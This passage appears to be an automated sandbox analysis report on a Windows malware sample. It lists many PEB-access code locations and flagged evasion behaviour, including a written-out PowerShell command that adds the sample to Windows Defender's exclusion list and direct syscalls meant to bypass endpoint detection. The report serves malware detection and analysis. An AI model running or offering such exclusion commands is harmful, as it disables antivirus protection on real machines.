                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017906F1 mov eax, dword ptr fs:[00000030h]4_2_017906F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017906F1 mov eax, dword ptr fs:[00000030h]4_2_017906F1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E6F2 mov eax, dword ptr fs:[00000030h]4_2_0178E6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0174A6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A6C7 mov eax, dword ptr fs:[00000030h]4_2_0174A6C7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017466B0 mov eax, dword ptr fs:[00000030h]4_2_017466B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C6A6 mov eax, dword ptr fs:[00000030h]4_2_0174C6A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714690 mov eax, dword ptr fs:[00000030h]4_2_01714690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714690 mov eax, dword ptr fs:[00000030h]4_2_01714690
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4978 mov eax, dword ptr fs:[00000030h]4_2_017B4978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4978 mov eax, dword ptr fs:[00000030h]4_2_017B4978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C97C mov eax, dword ptr fs:[00000030h]4_2_0179C97C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01736962 mov eax, dword ptr fs:[00000030h]4_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov eax, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov edx, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E mov eax, dword ptr fs:[00000030h]4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01790946 mov eax, dword ptr fs:[00000030h]4_2_01790946
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A892B mov eax, dword ptr fs:[00000030h]4_2_017A892B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179892A mov eax, dword ptr fs:[00000030h]4_2_0179892A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708918 mov eax, dword ptr fs:[00000030h]4_2_01708918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01708918 mov eax, dword ptr fs:[00000030h]4_2_01708918
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C912 mov eax, dword ptr fs:[00000030h]4_2_0179C912
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E908 mov eax, dword ptr fs:[00000030h]4_2_0178E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E908 mov eax, dword ptr fs:[00000030h]4_2_0178E908
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017429F9 mov eax, dword ptr fs:[00000030h]4_2_017429F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017429F9 mov eax, dword ptr fs:[00000030h]4_2_017429F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E9E0 mov eax, dword ptr fs:[00000030h]4_2_0179E9E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171A9D0 mov eax, dword ptr fs:[00000030h]4_2_0171A9D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017449D0 mov eax, dword ptr fs:[00000030h]4_2_017449D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA9D3 mov eax, dword ptr fs:[00000030h]4_2_017DA9D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A69C0 mov eax, dword ptr fs:[00000030h]4_2_017A69C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov esi, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov eax, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017989B3 mov eax, dword ptr fs:[00000030h]4_2_017989B3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A0 mov eax, dword ptr fs:[00000030h]4_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017109AD mov eax, dword ptr fs:[00000030h]4_2_017109AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017109AD mov eax, dword ptr fs:[00000030h]4_2_017109AD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6870 mov eax, dword ptr fs:[00000030h]4_2_017A6870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6870 mov eax, dword ptr fs:[00000030h]4_2_017A6870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E872 mov eax, dword ptr fs:[00000030h]4_2_0179E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E872 mov eax, dword ptr fs:[00000030h]4_2_0179E872
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740854 mov eax, dword ptr fs:[00000030h]4_2_01740854
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714859 mov eax, dword ptr fs:[00000030h]4_2_01714859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01714859 mov eax, dword ptr fs:[00000030h]4_2_01714859
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01722840 mov ecx, dword ptr fs:[00000030h]4_2_01722840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B483A mov eax, dword ptr fs:[00000030h]4_2_017B483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B483A mov eax, dword ptr fs:[00000030h]4_2_017B483A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174A830 mov eax, dword ptr fs:[00000030h]4_2_0174A830
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov ecx, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732835 mov eax, dword ptr fs:[00000030h]4_2_01732835
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C810 mov eax, dword ptr fs:[00000030h]4_2_0179C810
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C8F9 mov eax, dword ptr fs:[00000030h]4_2_0174C8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174C8F9 mov eax, dword ptr fs:[00000030h]4_2_0174C8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA8E4 mov eax, dword ptr fs:[00000030h]4_2_017DA8E4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173E8C0 mov eax, dword ptr fs:[00000030h]4_2_0173E8C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C89D mov eax, dword ptr fs:[00000030h]4_2_0179C89D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710887 mov eax, dword ptr fs:[00000030h]4_2_01710887
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170CB7E mov eax, dword ptr fs:[00000030h]4_2_0170CB7E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B8B42 mov eax, dword ptr fs:[00000030h]4_2_017B8B42
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6B40 mov eax, dword ptr fs:[00000030h]4_2_017A6B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6B40 mov eax, dword ptr fs:[00000030h]4_2_017A6B40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAB40 mov eax, dword ptr fs:[00000030h]4_2_017DAB40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EB20 mov eax, dword ptr fs:[00000030h]4_2_0173EB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EB20 mov eax, dword ptr fs:[00000030h]4_2_0173EB20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8B28 mov eax, dword ptr fs:[00000030h]4_2_017D8B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8B28 mov eax, dword ptr fs:[00000030h]4_2_017D8B28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178EB1D mov eax, dword ptr fs:[00000030h]4_2_0178EB1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718BF0 mov eax, dword ptr fs:[00000030h]4_2_01718BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179CBF0 mov eax, dword ptr fs:[00000030h]4_2_0179CBF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EBFC mov eax, dword ptr fs:[00000030h]4_2_0173EBFC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BEBD0 mov eax, dword ptr fs:[00000030h]4_2_017BEBD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01730BCB mov eax, dword ptr fs:[00000030h]4_2_01730BCB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710BCD mov eax, dword ptr fs:[00000030h]4_2_01710BCD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720BBE mov eax, dword ptr fs:[00000030h]4_2_01720BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720BBE mov eax, dword ptr fs:[00000030h]4_2_01720BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178CA72 mov eax, dword ptr fs:[00000030h]4_2_0178CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178CA72 mov eax, dword ptr fs:[00000030h]4_2_0178CA72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA6F mov eax, dword ptr fs:[00000030h]4_2_0174CA6F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716A50 mov eax, dword ptr fs:[00000030h]4_2_01716A50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720A5B mov eax, dword ptr fs:[00000030h]4_2_01720A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720A5B mov eax, dword ptr fs:[00000030h]4_2_01720A5B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01734A35 mov eax, dword ptr fs:[00000030h]4_2_01734A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01734A35 mov eax, dword ptr fs:[00000030h]4_2_01734A35
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA38 mov eax, dword ptr fs:[00000030h]4_2_0174CA38
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174CA24 mov eax, dword ptr fs:[00000030h]4_2_0174CA24
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173EA2E mov eax, dword ptr fs:[00000030h]4_2_0173EA2E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179CA11 mov eax, dword ptr fs:[00000030h]4_2_0179CA11
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174AAEE mov eax, dword ptr fs:[00000030h]4_2_0174AAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174AAEE mov eax, dword ptr fs:[00000030h]4_2_0174AAEE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710AD0 mov eax, dword ptr fs:[00000030h]4_2_01710AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744AD0 mov eax, dword ptr fs:[00000030h]4_2_01744AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744AD0 mov eax, dword ptr fs:[00000030h]4_2_01744AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766ACC mov eax, dword ptr fs:[00000030h]4_2_01766ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718AA0 mov eax, dword ptr fs:[00000030h]4_2_01718AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718AA0 mov eax, dword ptr fs:[00000030h]4_2_01718AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01766AA4 mov eax, dword ptr fs:[00000030h]4_2_01766AA4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01748A90 mov edx, dword ptr fs:[00000030h]4_2_01748A90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA80 mov eax, dword ptr fs:[00000030h]4_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4A80 mov eax, dword ptr fs:[00000030h]4_2_017E4A80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8D6B mov eax, dword ptr fs:[00000030h]4_2_017A8D6B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]4_2_01710D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]4_2_01710D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710D59 mov eax, dword ptr fs:[00000030h]4_2_01710D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]4_2_01718D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]4_2_01718D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]4_2_01718D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]4_2_01718D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01718D59 mov eax, dword ptr fs:[00000030h]4_2_01718D59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798D20 mov eax, dword ptr fs:[00000030h]4_2_01798D20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]4_2_01706D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]4_2_01706D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01706D10 mov eax, dword ptr fs:[00000030h]4_2_01706D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01744D1D mov eax, dword ptr fs:[00000030h]4_2_01744D1D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C8D10 mov eax, dword ptr fs:[00000030h]4_2_017C8D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C8D10 mov eax, dword ptr fs:[00000030h]4_2_017C8D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]4_2_0172AD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]4_2_0172AD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172AD00 mov eax, dword ptr fs:[00000030h]4_2_0172AD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173CDF0 mov eax, dword ptr fs:[00000030h]4_2_0173CDF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173CDF0 mov ecx, dword ptr fs:[00000030h]4_2_0173CDF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01706DF6 mov eax, dword ptr fs:[00000030h]4_2_01706DF6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0DF0 mov eax, dword ptr fs:[00000030h]4_2_017B0DF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0DF0 mov eax, dword ptr fs:[00000030h]4_2_017B0DF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171ADE0 mov eax, dword ptr fs:[00000030h]4_2_0171ADE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
